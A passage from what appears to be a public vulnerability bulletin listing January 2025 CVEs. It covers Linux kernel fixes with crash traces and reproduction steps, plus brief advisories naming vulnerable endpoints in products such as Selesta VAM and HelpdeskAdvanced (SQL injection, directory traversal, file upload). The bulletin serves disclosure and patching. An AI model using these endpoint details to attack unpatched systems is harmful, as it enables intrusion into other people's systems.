name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:proc_scheduler+0xc6/0x3c0 net/mptcp/ctrl.c:125 Code: 03 42 80 3c 38 00 0f 85 fe 02 00 00 4d 8b a4 24 08 09 00 00 48 b8 00 00 00 00 00 fc ff df 49 8d 7c 24 28 48 89 fa 48 c1 ea 03 <80> 3c 02 00 0f 85 cc 02 00 00 4d 8b 7c 24 28 48 8d 84 24 c8 00 00 RSP: 0018:ffffc900034774e8 EFLAGS: 00010206 RAX: dffffc0000000000 RBX: 1ffff9200068ee9e RCX: ffffc90003477620 RDX: 0000000000000005 RSI: ffffffff8b08f91e RDI: 0000000000000028 RBP: 0000000000000001 R08: ffffc90003477710 R09: 0000000000000040 R10: 0000000000000040 R11: 00000000726f7475 R12: 0000000000000000 R13: ffffc90003477620 R14: ffffc90003477710 R15: dffffc0000000000 FS: 0000000000000000(0000) GS:ffff8880b8700000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fee3cd452d8 CR3: 000000007d116000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> proc_sys_call_handler+0x403/0x5d0 fs/proc/proc_sysctl.c:601 __kernel_write_iter+0x318/0xa80 fs/read_write.c:612 __kernel_write+0xf6/0x140 fs/read_write.c:632 do_acct_process+0xcb0/0x14a0 kernel/acct.c:539 acct_pin_kill+0x2d/0x100 kernel/acct.c:192 pin_kill+0x194/0x7c0 fs/fs_pin.c:44 mnt_pin_kill+0x61/0x1e0 fs/fs_pin.c:81 cleanup_mnt+0x3ac/0x450 fs/namespace.c:1366 task_work_run+0x14e/0x250 kernel/task_work.c:239 exit_task_work include/linux/task_work.h:43 [inline] do_exit+0xad8/0x2d70 kernel/exit.c:938 do_group_exit+0xd3/0x2a0 kernel/exit.c:1087 get_signal+0x2576/0x2610 kernel/signal.c:3017 arch_do_signal_or_restart+0x90/0x7e0 arch/x86/kernel/signal.c:337 exit_to_user_mode_loop kernel/entry/common.c:111 [inline] exit_to_user_mode_prepare include/linux/entry-common.h:329 [inline] __syscall_exit_to_user_mode_work kernel/entry/common.c:207 [inline] syscall_exit_to_user_mode+0x150/0x2a0 kernel/entry/common.c:218 do_syscall_64+0xda/0x250 arch/x86/entry/common.c:89 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7fee3cb87a6a Code: Unable to access opcode bytes at 0x7fee3cb87a40. RSP: 002b:00007fffcccac688 EFLAGS: 00000202 ORIG_RAX: 0000000000000037 RAX: 0000000000000000 RBX: 00007fffcccac710 RCX: 00007fee3cb87a6a RDX: 0000000000000041 RSI: 0000000000000000 RDI: 0000000000000003 RBP: 0000000000000003 R08: 00007fffcccac6ac R09: 00007fffcccacac7 R10: 00007fffcccac710 R11: 0000000000000202 R12: 00007fee3cd49500 R13: 00007fffcccac6ac R14: 0000000000000000 R15: 00007fee3cd4b000 </TASK> Modules linked in: ---[ end trace 0000000000000000 ]--- RIP: 0010:proc_scheduler+0xc6/0x3c0 net/mptcp/ctrl.c:125 Code: 03 42 80 3c 38 00 0f 85 fe 02 00 00 4d 8b a4 24 08 09 00 00 48 b8 00 00 00 00 00 fc ---truncated--- | 2025-01-19 | not yet calculated | CVE-2025-21642 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netfs: Fix kernel async DIO Netfslib needs to be able to handle kernel-initiated asynchronous DIO that is supplied with a bio_vec[] array. Currently, because of the async flag, this gets passed to netfs_extract_user_iter() which throws a warning and fails because it only handles IOVEC and UBUF iterators. This can be triggered through a combination of cifs and a loopback blockdev with something like: mount //my/cifs/share /foo dd if=/dev/zero of=/foo/m0 bs=4K count=1K losetup --sector-size 4096 --direct-io=on /dev/loop2046 /foo/m0 echo hello >/dev/loop2046 This causes the following to appear in syslog: WARNING: CPU: 2 PID: 109 at fs/netfs/iterator.c:50 netfs_extract_user_iter+0x170/0x250 [netfs] and the write to fail. Fix this by removing the check in netfs_unbuffered_write_iter_locked() that causes async kernel DIO writes to be handled as userspace writes. Note that this change relies on the kernel caller maintaining the existence of the bio_vec array (or kvec[] or folio_queue) until the op is complete. | 2025-01-19 | not yet calculated | CVE-2025-21643 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/xe: Fix tlb invalidation when wedging If GuC fails to load, the driver wedges, but in the process it tries to do stuff that may not be initialized yet. This moves the xe_gt_tlb_invalidation_init() to be done earlier: as its own doc says, it's a software-only initialization and should had been named with the _early() suffix. Move it to be called by xe_gt_init_early(), so the locks and seqno are initialized, avoiding a NULL ptr deref when wedging: xe 0000:03:00.0: [drm] *ERROR* GT0: load failed: status: Reset = 0, BootROM = 0x50, UKernel = 0x00, MIA = 0x00, Auth = 0x01 xe 0000:03:00.0: [drm] *ERROR* GT0: firmware signature verification failed xe 0000:03:00.0: [drm] *ERROR* CRITICAL: Xe has declared device 0000:03:00.0 as wedged. ... BUG: kernel NULL pointer dereference, address: 0000000000000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI CPU: 9 UID: 0 PID: 3908 Comm: modprobe Tainted: G U W 6.13.0-rc4-xe+ #3 Tainted: [U]=USER, [W]=WARN Hardware name: Intel Corporation Alder Lake Client Platform/AlderLake-S ADP-S DDR5 UDIMM CRB, BIOS ADLSFWI1.R00.3275.A00.2207010640 07/01/2022 RIP: 0010:xe_gt_tlb_invalidation_reset+0x75/0x110 [xe] This can be easily triggered by poking the GuC binary to force a signature failure. There will still be an extra message, xe 0000:03:00.0: [drm] *ERROR* GT0: GuC mmio request 0x4100: no reply 0x4100 but that's better than a NULL ptr deref. (cherry picked from commit 5001ef3af8f2c972d6fd9c5221a8457556f8bea6) | 2025-01-19 | not yet calculated | CVE-2025-21644 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd/pmc: Only disable IRQ1 wakeup where i8042 actually enabled it Wakeup for IRQ1 should be disabled only in cases where i8042 had actually enabled it, otherwise "wake_depth" for this IRQ will try to drop below zero and there will be an unpleasant WARN() logged: kernel: atkbd serio0: Disabling IRQ1 wakeup source to avoid platform firmware bug kernel: ------------[ cut here ]------------ kernel: Unbalanced IRQ 1 wake disable kernel: WARNING: CPU: 10 PID: 6431 at kernel/irq/manage.c:920 irq_set_irq_wake+0x147/0x1a0 The PMC driver uses DEFINE_SIMPLE_DEV_PM_OPS() to define its dev_pm_ops which sets amd_pmc_suspend_handler() to the .suspend, .freeze, and .poweroff handlers. i8042_pm_suspend(), however, is only set as the .suspend handler. Fix the issue by call PMC suspend handler only from the same set of dev_pm_ops handlers as i8042_pm_suspend(), which currently means just the .suspend handler. To reproduce this issue try hibernating (S4) the machine after a fresh boot without putting it into s2idle first. [ij: edited the commit message.] | 2025-01-19 | not yet calculated | CVE-2025-21645 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: afs: Fix the maximum cell name length The kafs filesystem limits the maximum length of a cell to 256 bytes, but a problem occurs if someone actually does that: kafs tries to create a directory under /proc/net/afs/ with the name of the cell, but that fails with a warning: WARNING: CPU: 0 PID: 9 at fs/proc/generic.c:405 because procfs limits the maximum filename length to 255. However, the DNS limits the maximum lookup length and, by extension, the maximum cell name, to 255 less two (length count and trailing NUL). Fix this by limiting the maximum acceptable cellname length to 253. This also allows us to be sure we can create the "/afs/.<cell>/" mountpoint too. Further, split the YFS VL record cell name maximum to be the 256 allowed by the protocol and ignore the record retrieved by YFSVL.GetCellName if it exceeds 253. | 2025-01-19 | not yet calculated | CVE-2025-21646 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: sched: sch_cake: add bounds checks to host bulk flow fairness counts Even though we fixed a logic error in the commit cited below, syzbot still managed to trigger an underflow of the per-host bulk flow counters, leading to an out of bounds memory access. To avoid any such logic errors causing out of bounds memory accesses, this commit factors out all accesses to the per-host bulk flow counters to a series of helpers that perform bounds-checking before any increments and decrements. This also has the benefit of improving readability by moving the conditional checks for the flow mode into these helpers, instead of having them spread out throughout the code (which was the cause of the original logic error). As part of this change, the flow quantum calculation is consolidated into a helper function, which means that the dithering applied to the ost load scaling is now applied both in the DRR rotation and when a sparse flow's quantum is first initiated. The only user-visible effect of this is that the maximum packet size that can be sent while a flow stays sparse will now vary with +/- one byte in some cases. This should not make a noticeable difference in practice, and thus it's not worth complicating the code to preserve the old behaviour. | 2025-01-19 | not yet calculated | CVE-2025-21647 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: netfilter: conntrack: clamp maximum hashtable size to INT_MAX Use INT_MAX as maximum size for the conntrack hashtable. Otherwise, it is possible to hit WARN_ON_ONCE in __kvmalloc_node_noprof() when resizing hashtable because __GFP_NOWARN is unset. See: 0708a0afe291 ("mm: Consider __GFP_NOWARN flag for oversized kvmalloc() calls") Note: hashtable resize is only possible from init_netns. | 2025-01-19 | not yet calculated | CVE-2025-21648 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix kernel crash when 1588 is sent on HIP08 devices Currently, HIP08 devices does not register the ptp devices, so the hdev->ptp is NULL. But the tx process would still try to set hardware time stamp info with SKBTX_HW_TSTAMP flag and cause a kernel crash. [ 128.087798] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000018 ... [ 128.280251] pc : hclge_ptp_set_tx_info+0x2c/0x140 [hclge] [ 128.286600] lr : hclge_ptp_set_tx_info+0x20/0x140 [hclge] [ 128.292938] sp : ffff800059b93140 [ 128.297200] x29: ffff800059b93140 x28: 0000000000003280 [ 128.303455] x27: ffff800020d48280 x26: ffff0cb9dc814080 [ 128.309715] x25: ffff0cb9cde93fa0 x24: 0000000000000001 [ 128.315969] x23: 0000000000000000 x22: 0000000000000194 [ 128.322219] x21: ffff0cd94f986000 x20: 0000000000000000 [ 128.328462] x19: ffff0cb9d2a166c0 x18: 0000000000000000 [ 128.334698] x17: 0000000000000000 x16: ffffcf1fc523ed24 [ 128.340934] x15: 0000ffffd530a518 x14: 0000000000000000 [ 128.347162] x13: ffff0cd6bdb31310 x12: 0000000000000368 [ 128.353388] x11: ffff0cb9cfbc7070 x10: ffff2cf55dd11e02 [ 128.359606] x9 : ffffcf1f85a212b4 x8 : ffff0cd7cf27dab0 [ 128.365831] x7 : 0000000000000a20 x6 : ffff0cd7cf27d000 [ 128.372040] x5 : 0000000000000000 x4 : 000000000000ffff [ 128.378243] x3 : 0000000000000400 x2 : ffffcf1f85a21294 [ 128.384437] x1 : ffff0cb9db520080 x0 : ffff0cb9db500080 [ 128.390626] Call trace: [ 128.393964] hclge_ptp_set_tx_info+0x2c/0x140 [hclge] [ 128.399893] hns3_nic_net_xmit+0x39c/0x4c4 [hns3] [ 128.405468] xmit_one.constprop.0+0xc4/0x200 [ 128.410600] dev_hard_start_xmit+0x54/0xf0 [ 128.415556] sch_direct_xmit+0xe8/0x634 [ 128.420246] __dev_queue_xmit+0x224/0xc70 [ 128.425101] dev_queue_xmit+0x1c/0x40 [ 128.429608] ovs_vport_send+0xac/0x1a0 [openvswitch] [ 128.435409] do_output+0x60/0x17c [openvswitch] [ 128.440770] do_execute_actions+0x898/0x8c4 [openvswitch] [ 128.446993] ovs_execute_actions+0x64/0xf0 [openvswitch] [ 128.453129] ovs_dp_process_packet+0xa0/0x224 [openvswitch] [ 128.459530] ovs_vport_receive+0x7c/0xfc [openvswitch] [ 128.465497] internal_dev_xmit+0x34/0xb0 [openvswitch] [ 128.471460] xmit_one.constprop.0+0xc4/0x200 [ 128.476561] dev_hard_start_xmit+0x54/0xf0 [ 128.481489] __dev_queue_xmit+0x968/0xc70 [ 128.486330] dev_queue_xmit+0x1c/0x40 [ 128.490856] ip_finish_output2+0x250/0x570 [ 128.495810] __ip_finish_output+0x170/0x1e0 [ 128.500832] ip_finish_output+0x3c/0xf0 [ 128.505504] ip_output+0xbc/0x160 [ 128.509654] ip_send_skb+0x58/0xd4 [ 128.513892] udp_send_skb+0x12c/0x354 [ 128.518387] udp_sendmsg+0x7a8/0x9c0 [ 128.522793] inet_sendmsg+0x4c/0x8c [ 128.527116] __sock_sendmsg+0x48/0x80 [ 128.531609] __sys_sendto+0x124/0x164 [ 128.536099] __arm64_sys_sendto+0x30/0x5c [ 128.540935] invoke_syscall+0x50/0x130 [ 128.545508] el0_svc_common.constprop.0+0x10c/0x124 [ 128.551205] do_el0_svc+0x34/0xdc [ 128.555347] el0_svc+0x20/0x30 [ 128.559227] el0_sync_handler+0xb8/0xc0 [ 128.563883] el0_sync+0x160/0x180 | 2025-01-19 | not yet calculated | CVE-2025-21649 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: hns3: fixed hclge_fetch_pf_reg accesses bar space out of bounds issue The TQP BAR space is divided into two segments. TQPs 0-1023 and TQPs 1024-1279 are in different BAR space addresses. However, hclge_fetch_pf_reg does not distinguish the tqp space information when reading the tqp space information. When the number of TQPs is greater than 1024, access bar space overwriting occurs. The problem of different segments has been considered during the initialization of tqp.io_base. Therefore, tqp.io_base is directly used when the queue is read in hclge_fetch_pf_reg. The error message: Unable to handle kernel paging request at virtual address ffff800037200000 pc : hclge_fetch_pf_reg+0x138/0x250 [hclge] lr : hclge_get_regs+0x84/0x1d0 [hclge] Call trace: hclge_fetch_pf_reg+0x138/0x250 [hclge] hclge_get_regs+0x84/0x1d0 [hclge] hns3_get_regs+0x2c/0x50 [hns3] ethtool_get_regs+0xf4/0x270 dev_ethtool+0x674/0x8a0 dev_ioctl+0x270/0x36c sock_do_ioctl+0x110/0x2a0 sock_ioctl+0x2ac/0x530 __arm64_sys_ioctl+0xa8/0x100 invoke_syscall+0x4c/0x124 el0_svc_common.constprop.0+0x140/0x15c do_el0_svc+0x30/0xd0 el0_svc+0x1c/0x2c el0_sync_handler+0xb0/0xb4 el0_sync+0x168/0x180 | 2025-01-19 | not yet calculated | CVE-2025-21650 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: hns3: don't auto enable misc vector Currently, there is a time window between misc irq enabled and service task inited. If an interrupte is reported at this time, it will cause warning like below: [ 16.324639] Call trace: [ 16.324641] __queue_delayed_work+0xb8/0xe0 [ 16.324643] mod_delayed_work_on+0x78/0xd0 [ 16.324655] hclge_errhand_task_schedule+0x58/0x90 [hclge] [ 16.324662] hclge_misc_irq_handle+0x168/0x240 [hclge] [ 16.324666] __handle_irq_event_percpu+0x64/0x1e0 [ 16.324667] handle_irq_event+0x80/0x170 [ 16.324670] handle_fasteoi_edge_irq+0x110/0x2bc [ 16.324671] __handle_domain_irq+0x84/0xfc [ 16.324673] gic_handle_irq+0x88/0x2c0 [ 16.324674] el1_irq+0xb8/0x140 [ 16.324677] arch_cpu_idle+0x18/0x40 [ 16.324679] default_idle_call+0x5c/0x1bc [ 16.324682] cpuidle_idle_call+0x18c/0x1c4 [ 16.324684] do_idle+0x174/0x17c [ 16.324685] cpu_startup_entry+0x30/0x6c [ 16.324687] secondary_start_kernel+0x1a4/0x280 [ 16.324688] ---[ end trace 6aa0bff672a964aa ]--- So don't auto enable misc vector when request irq.. | 2025-01-19 | not yet calculated | CVE-2025-21651 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ipvlan: Fix use-after-free in ipvlan_get_iflink(). syzbot presented an use-after-free report [0] regarding ipvlan and linkwatch. ipvlan does not hold a refcnt of the lower device unlike vlan and macvlan. If the linkwatch work is triggered for the ipvlan dev, the lower dev might have already been freed, resulting in UAF of ipvlan->phy_dev in ipvlan_get_iflink(). We can delay the lower dev unregistration like vlan and macvlan by holding the lower dev's refcnt in dev->netdev_ops->ndo_init() and releasing it in dev->priv_destructor(). Jakub pointed out calling .ndo_XXX after unregister_netdevice() has returned is error prone and suggested [1] addressing this UAF in the core by taking commit 750e51603395 ("net: avoid potential UAF in default_operstate()") further. Let's assume unregistering devices DOWN and use RCU protection in default_operstate() not to race with the device unregistration. [0]: BUG: KASAN: slab-use-after-free in ipvlan_get_iflink+0x84/0x88 drivers/net/ipvlan/ipvlan_main.c:353 Read of size 4 at addr ffff0000d768c0e0 by task kworker/u8:35/6944 CPU: 0 UID: 0 PID: 6944 Comm: kworker/u8:35 Not tainted 6.13.0-rc2-g9bc5c9515b48 #12 4c3cb9e8b4565456f6a355f312ff91f4f29b3c47 Hardware name: linux,dummy-virt (DT) Workqueue: events_unbound linkwatch_event Call trace: show_stack+0x38/0x50 arch/arm64/kernel/stacktrace.c:484 (C) __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0xbc/0x108 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0x16c/0x6f0 mm/kasan/report.c:489 kasan_report+0xc0/0x120 mm/kasan/report.c:602 __asan_report_load4_noabort+0x20/0x30 mm/kasan/report_generic.c:380 ipvlan_get_iflink+0x84/0x88 drivers/net/ipvlan/ipvlan_main.c:353 dev_get_iflink+0x7c/0xd8 net/core/dev.c:674 default_operstate net/core/link_watch.c:45 [inline] rfc2863_policy+0x144/0x360 net/core/link_watch.c:72 linkwatch_do_dev+0x60/0x228 net/core/link_watch.c:175 __linkwatch_run_queue+0x2f4/0x5b8 net/core/link_watch.c:239 linkwatch_event+0x64/0xa8 net/core/link_watch.c:282 process_one_work+0x700/0x1398 kernel/workqueue.c:3229 process_scheduled_works kernel/workqueue.c:3310 [inline] worker_thread+0x8c4/0xe10 kernel/workqueue.c:3391 kthread+0x2b0/0x360 kernel/kthread.c:389 ret_from_fork+0x10/0x20 arch/arm64/kernel/entry.S:862 Allocated by task 9303: kasan_save_stack mm/kasan/common.c:47 [inline] kasan_save_track+0x30/0x68 mm/kasan/common.c:68 kasan_save_alloc_info+0x44/0x58 mm/kasan/generic.c:568 poison_kmalloc_redzone mm/kasan/common.c:377 [inline] __kasan_kmalloc+0x84/0xa0 mm/kasan/common.c:394 kasan_kmalloc include/linux/kasan.h:260 [inline] __do_kmalloc_node mm/slub.c:4283 [inline] __kmalloc_node_noprof+0x2a0/0x560 mm/slub.c:4289 __kvmalloc_node_noprof+0x9c/0x230 mm/util.c:650 alloc_netdev_mqs+0xb4/0x1118 net/core/dev.c:11209 rtnl_create_link+0x2b8/0xb60 net/core/rtnetlink.c:3595 rtnl_newlink_create+0x19c/0x868 net/core/rtnetlink.c:3771 __rtnl_newlink net/core/rtnetlink.c:3896 [inline] rtnl_newlink+0x122c/0x15c0 net/core/rtnetlink.c:4011 rtnetlink_rcv_msg+0x61c/0x918 net/core/rtnetlink.c:6901 netlink_rcv_skb+0x1dc/0x398 net/netlink/af_netlink.c:2542 rtnetlink_rcv+0x34/0x50 net/core/rtnetlink.c:6928 netlink_unicast_kernel net/netlink/af_netlink.c:1321 [inline] netlink_unicast+0x618/0x838 net/netlink/af_netlink.c:1347 netlink_sendmsg+0x5fc/0x8b0 net/netlink/af_netlink.c:1891 sock_sendmsg_nosec net/socket.c:711 [inline] __sock_sendmsg net/socket.c:726 [inline] __sys_sendto+0x2ec/0x438 net/socket.c:2197 __do_sys_sendto net/socket.c:2204 [inline] __se_sys_sendto net/socket.c:2200 [inline] __arm64_sys_sendto+0xe4/0x110 net/socket.c:2200 __invoke_syscall arch/arm64/kernel/syscall.c:35 [inline] invoke_syscall+0x90/0x278 arch/arm64/kernel/syscall.c:49 el0_svc_common+0x13c/0x250 arch/arm64/kernel/syscall.c:132 do_el0_svc+0x54/0x70 arch/arm64/kernel/syscall.c:151 el ---truncated--- | 2025-01-19 | not yet calculated | CVE-2025-21652 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net_sched: cls_flow: validate TCA_FLOW_RSHIFT attribute syzbot found that TCA_FLOW_RSHIFT attribute was not validated. Right shitfing a 32bit integer is undefined for large shift values. UBSAN: shift-out-of-bounds in net/sched/cls_flow.c:329:23 shift exponent 9445 is too large for 32-bit type 'u32' (aka 'unsigned int') CPU: 1 UID: 0 PID: 54 Comm: kworker/u8:3 Not tainted 6.13.0-rc3-syzkaller-00180-g4f619d518db9 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Workqueue: ipv6_addrconf addrconf_dad_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120 ubsan_epilogue lib/ubsan.c:231 [inline] __ubsan_handle_shift_out_of_bounds+0x3c8/0x420 lib/ubsan.c:468 flow_classify+0x24d5/0x25b0 net/sched/cls_flow.c:329 tc_classify include/net/tc_wrapper.h:197 [inline] __tcf_classify net/sched/cls_api.c:1771 [inline] tcf_classify+0x420/0x1160 net/sched/cls_api.c:1867 sfb_classify net/sched/sch_sfb.c:260 [inline] sfb_enqueue+0x3ad/0x18b0 net/sched/sch_sfb.c:318 dev_qdisc_enqueue+0x4b/0x290 net/core/dev.c:3793 __dev_xmit_skb net/core/dev.c:3889 [inline] __dev_queue_xmit+0xf0e/0x3f50 net/core/dev.c:4400 dev_queue_xmit include/linux/netdevice.h:3168 [inline] neigh_hh_output include/net/neighbour.h:523 [inline] neigh_output include/net/neighbour.h:537 [inline] ip_finish_output2+0xd41/0x1390 net/ipv4/ip_output.c:236 iptunnel_xmit+0x55d/0x9b0 net/ipv4/ip_tunnel_core.c:82 udp_tunnel_xmit_skb+0x262/0x3b0 net/ipv4/udp_tunnel_core.c:173 geneve_xmit_skb drivers/net/geneve.c:916 [inline] geneve_xmit+0x21dc/0x2d00 drivers/net/geneve.c:1039 __netdev_start_xmit include/linux/netdevice.h:5002 [inline] netdev_start_xmit include/linux/netdevice.h:5011 [inline] xmit_one net/core/dev.c:3590 [inline] dev_hard_start_xmit+0x27a/0x7d0 net/core/dev.c:3606 __dev_queue_xmit+0x1b73/0x3f50 net/core/dev.c:4434 | 2025-01-19 | not yet calculated | CVE-2025-21653 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: ovl: support encoding fid from inode with no alias Dmitry Safonov reported that a WARN_ON() assertion can be trigered by userspace when calling inotify_show_fdinfo() for an overlayfs watched inode, whose dentry aliases were discarded with drop_caches. The WARN_ON() assertion in inotify_show_fdinfo() was removed, because it is possible for encoding file handle to fail for other reason, but the impact of failing to encode an overlayfs file handle goes beyond this assertion. As shown in the LTP test case mentioned in the link below, failure to encode an overlayfs file handle from a non-aliased inode also leads to failure to report an fid with FAN_DELETE_SELF fanotify events. As Dmitry notes in his analyzis of the problem, ovl_encode_fh() fails if it cannot find an alias for the inode, but this failure can be fixed. ovl_encode_fh() seldom uses the alias and in the case of non-decodable file handles, as is often the case with fanotify fid info, ovl_encode_fh() never needs to use the alias to encode a file handle. Defer finding an alias until it is actually needed so ovl_encode_fh() will not fail in the common case of FAN_DELETE_SELF fanotify events. | 2025-01-19 | not yet calculated | CVE-2025-21654 |
| Luxion--KeyShot Viewer |
Luxion KeyShot Viewer KSP File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of KSP files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22139. | 2025-01-13 | not yet calculated | CVE-2025-0412 |
| Moxa--EDS-508A Series |
Moxa's Ethernet switch EDS-508A Series, running firmware version 3.11 and earlier, is vulnerable to an authentication bypass because of flaws in its authorization mechanism. Although both client-side and back-end server verification are involved in the process, attackers can exploit weaknesses in its implementation. These vulnerabilities may enable brute-force attacks to guess valid credentials or MD5 collision attacks to forge authentication hashes, potentially compromising the security of the device. | 2025-01-15 | not yet calculated | CVE-2024-12297 |
| Moxa--MGate 5121 Series |
A stored Cross-site Scripting (XSS) vulnerability exists in the MGate 5121/5122/5123 Series firmware version v1.0 because of insufficient sanitization and encoding of user input in the "Login Message" functionality. An authenticated attacker with administrative access can exploit this vulnerability to inject malicious scripts that are continuously stored on the device. These scripts are executed when other users access the login page, potentially resulting in unauthorized actions or other impacts, depending on the user's privileges. | 2025-01-15 | not yet calculated | CVE-2025-0193 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Directory Traversal via the Attachment/DownloadTempFile function. | 2025-01-13 | not yet calculated | CVE-2023-42225 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Directory Traversal via Email/SaveAttachment function. | 2025-01-13 | not yet calculated | CVE-2023-42226 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Directory Traversal via the WSCView/Save function. | 2025-01-13 | not yet calculated | CVE-2023-42227 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Incorrect Access Control. Low privileged users can edit their own ACL rules by sending a request to the "AclList/SaveAclRules" administrative function. | 2025-01-13 | not yet calculated | CVE-2023-42228 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Directory Traversal. Arbitrary files can be created on the system via authenticated SOAP requests to the WSConnector service. | 2025-01-13 | not yet calculated | CVE-2023-42229 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Incorrect Access Control. Low privileged users can delete admin users by sending a request to the "WSCView/Delete" function. | 2025-01-13 | not yet calculated | CVE-2023-42231 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Directory Traversal via the Navigator/Index function. | 2025-01-13 | not yet calculated | CVE-2023-42232 |
| n/a--n/a |
Pat Infinite Solutions HelpdeskAdvanced <= 11.0.33 is vulnerable to Cross Site Request Forgery (CSRF) via the WSCView function. | 2025-01-13 | not yet calculated | CVE-2023-42234 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in multiple parameters of /monitor/s_normalizedtrans.php. | 2025-01-13 | not yet calculated | CVE-2023-42235 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in a GET parameter of /common/ajaxfunction.php. | 2025-01-13 | not yet calculated | CVE-2023-42236 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in multiple GET parameters of /vam/vam_i_command.php. | 2025-01-13 | not yet calculated | CVE-2023-42237 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in multiple POST parameters of /vam/vam_eps.php. | 2025-01-13 | not yet calculated | CVE-2023-42238 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in multiple POST parameters of /vam/vam_ep.php. | 2025-01-13 | not yet calculated | CVE-2023-42239 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in multiple POST parameters of /monitor/s_scheduledfile.php. | 2025-01-13 | not yet calculated | CVE-2023-42240 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in multiple POST parameters of /vam/vam_anagraphic.php. | 2025-01-13 | not yet calculated | CVE-2023-42241 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can perform SQL Injection in a GET parameter of /monitor/s_terminal.php. | 2025-01-13 | not yet calculated | CVE-2023-42242 |
| n/a--n/a |
In Selesta Visual Access Manager < 4.42.2, an authenticated user can access the administrative page /common/vam_Sql.php, which allows for arbitrary SQL queries. | 2025-01-13 | not yet calculated | CVE-2023-42243 |
| n/a--n/a |
An issue was discovered in Selesta Visual Access Manager (VAM) prior to 4.42.2. An authenticated attacker can write arbitrary files by manipulating POST parameters of the page "common/vam_Sql.php". | 2025-01-13 | not yet calculated | CVE-2023-42248 |
| n/a--n/a |
An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL. | 2025-01-15 | not yet calculated | CVE-2024-36751 |
| n/a--n/a |
Insecure permissions in Aginode GigaSwitch v5 allows attackers to access sensitive information via using the SCP command. | 2025-01-15 | not yet calculated | CVE-2024-39967 |
| n/a--n/a |
An issue in themesebrand Chatvia v.5.3.2 allows a remote attacker to execute arbitrary code via the User profile Upload image function. | 2025-01-16 | not yet calculated | CVE-2024-40513 |
| n/a--n/a |
Insecure Permissions vulnerability in themesebrand Chatvia v.5.3.2 allows a remote attacker to escalate privileges via the User profile name and image upload functions. | 2025-01-16 | not yet calculated | CVE-2024-40514 |
| n/a--n/a |
An arbitrary file upload vulnerability in the UI login page logo upload function of Process Maker pm4core-docker 4.1.21-RC7 allows attackers to execute arbitrary code via uploading a crafted PHP or HTML file. | 2025-01-15 | not yet calculated | CVE-2024-41454 |
| n/a--n/a |
ECOVACS Robotics Deebot T20 OMNI and T20e OMNI before 1.24.0 was discovered to contain a WiFi Remote Code Execution vulnerability. | 2025-01-14 | not yet calculated | CVE-2024-42911 |
| n/a--n/a |
Incorrect access control in Tenda AC1200 Smart Dual-Band WiFi Router Model AC6 v2.0 Firmware v15.03.06.50 allows attackers to bypass authentication via a crafted web request. | 2025-01-16 | not yet calculated | CVE-2024-46450 |
| n/a--n/a |
